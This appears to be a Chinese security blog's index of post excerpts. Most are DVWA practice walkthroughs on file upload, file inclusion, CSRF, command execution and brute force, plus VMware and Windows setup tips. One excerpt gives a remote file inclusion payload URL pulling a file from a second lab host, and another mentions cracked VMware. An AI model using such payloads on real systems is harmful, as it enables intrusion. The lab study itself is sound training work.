Junglezt的博客

摘要： Insecure CAPTCHA，意思为不安全的验证码 全称为Completely Automated Public Turing Test to Tell Computers and Humans Apart,意思是全自动公共图灵测试，区分计算机和人类 顾名思义，想通过验证码拦截我们的操作，绕过即 阅读全文

摘要： 文件上传是很危险的漏洞，攻击者上传木马到服务器，可以获取服务器的操作权限 LOW 审计源码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // 定义 文件上传位置，这里的 DVWA_WEB_PAGE_TO_ROOT 是作者自定义的一个变量 $target_pat 阅读全文

摘要： 安装vmware 首先就是下载VMware客户端了，Vmware是收费的，过好大多数都有破解版，或者激活码 这里我是用的是VMware16,下载在网上搜一下就有，例如 下载解压后里面有一个后缀为exe的安装程序，运行程序进行安装vmware 稍等片刻，进入安装向导界面 选择安装路径，也可以默认 最后 阅读全文

摘要： 文件包含漏洞，当我们在一个代码文件想要引入、嵌套另一个代码文件的时候，就是文件包含。 常见的文件包含函数有include require等函数。 这两个函数的区别就是include在包含文件不存在时php代码会继续往下执行，而require则终止php代码的执行 Include:包含一个文件 Inc 阅读全文

摘要： csrf(Cross-site request forgery)跨站请求伪造：攻击者诱导用户访问第三方网站，在第三方网站中携带恶意代码，向被攻击者发送请求 原理可以这样来说 用户在访问了一个后台管理网站后，例如用户更改密码，但是更改密码需要登录认证的，用户在登录后，浏览器会保存认证一段时间，叫做co 阅读全文

摘要： 命令执行漏洞，顾名思义，服务端在进行一些网站的操作、管理的时候，需要调用系统命令，如果对传入的命令参数没有进行一些过滤，可以直接执行服务器系统的命令终端 LOW 审计源码 <?php // 判断是否提交了 Submit if( isset( $_POST[ 'Submit' ] ) ) { // 获 阅读全文

摘要： 暴力破解漏洞，没有对登录框做登录限制，攻击者可以不断的尝试暴力枚举用户名和密码 LOW 审计源码 <?php // 通过GET请求获取Login传参， // isset判断一个变量是否已设置，判断方法是变量是否为null if( isset( $_GET[ 'Login' ] ) ) { // 获取 阅读全文

摘要： DVWA是一个新手练习Web安全很好的测试平台，官网下载请见https://dvwa.co.uk/ 想要练习，首先需要搭建，对于小白来说，搭建一个平台可能有一点点费劲，网上有很多大佬的教程，这里我总结一些我的搭建过程 只需要安装phpstudy然后将下载的dvwa压缩包解压到phpstudy安装目录 阅读全文

摘要： 任务栏设置 任务栏居中 由于windows默认的程序是从左往右显示，看着可能有一点不舒服，当然如果使用习惯的话，忽然居中，可能更不舒服 首先搜索字符映射表 点击字符映设表中第五行的空白字符，选择进行复制 创建文件夹，将文件夹的名称改为复制的空白字符 这时就得到一个空格文件夹名，然后右键任务栏 -> 阅读全文

摘要： File include(文件包含) Example 1 没有任何过滤 审计源码 没有对我们传参的page进行任何过滤，payload如下 http://172.16.1.104/fileincl/example1.php?page=http://172.16.1.102/info.txt 本机in 阅读全文